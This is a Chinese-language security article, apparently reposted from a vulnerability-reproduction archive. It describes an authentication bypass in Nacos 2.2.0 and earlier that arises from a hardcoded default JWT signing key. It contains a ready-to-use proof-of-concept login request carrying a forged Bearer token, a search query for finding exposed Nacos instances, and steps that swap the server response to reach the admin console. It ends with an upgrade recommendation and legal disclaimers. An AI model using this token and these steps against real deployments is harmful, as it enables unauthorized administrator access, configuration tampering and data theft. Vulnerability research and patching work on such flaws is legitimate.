2026-02-04 17:41:34 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： Nacos小于等于2.2.0版本因默认JWT密钥硬编码存在权限绕过漏洞，攻击者利用固定密钥伪造令牌可绕过登录认证获取管理员权限，进而完全控制系统。文档提供了资产测绘语法、漏洞原理及具体POC复现步骤，建议用户升级至最新版本以消除风险。 综合评分： 80 文章分类： 漏洞POC,漏洞分析,WEB安全

cover_image

Nacos默认key导致权限绕过登陆漏洞附POC

安服仔安服仔

北风漏洞复现文库

2026年2月4日 11:03 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

—

漏洞名称

Nacos默认key导致权限绕过登陆漏洞

—

影响版本

Nacos在版本≤2.2.0时

—

漏洞简介

Nacos是一个易于使用的平台，专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。Nacos在版本≤2.2.0时，默认未修改JWT的签名密钥，该密钥硬编码为固定值。攻击者可利用此默认密钥生成合法的JWT令牌,伪造用户身份，绕过身份认证直接登录后台。攻击者可通过伪造令牌获取管理员权限,进而操作服务配置、窃取敏感数据，甚至植入恶意代码，导致系统完全受控。

—

资产测绘

app="Nacos"

—

漏洞复现

POC

POST&nbsp;/nacos/v1/auth/users/login HTTP/1.1Host:&nbsp;127.0.0.1Content-Length:&nbsp;28Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0&nbsp;(Windows NT&nbsp;10.0; Win64; x64) AppleWebKit/537.36&nbsp;(KHTML, like Gecko) Chrome/117.0.0.0&nbsp;Safari/537.36Content-Type: application/x-www-form-urlencodedAuthorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6NDA3MDk1MzY0M30.XPfd1WnNHqQdu5-D734ishsizYCEbsQG7mVwdm4MyWgAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeusername=nacos&password=1111

通过POC获取返回包的内容，将返回包内容全部复制

在账号密码错误的情况下返回包为403

将拦截的返回包替换为之前的返回包内容

发包之后成功登录后台

—

修复建议

升级到最新版本。

—

往期回顾

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北风漏洞复现文库安服仔安服仔《Nacos默认key导致权限绕过登陆漏洞附POC》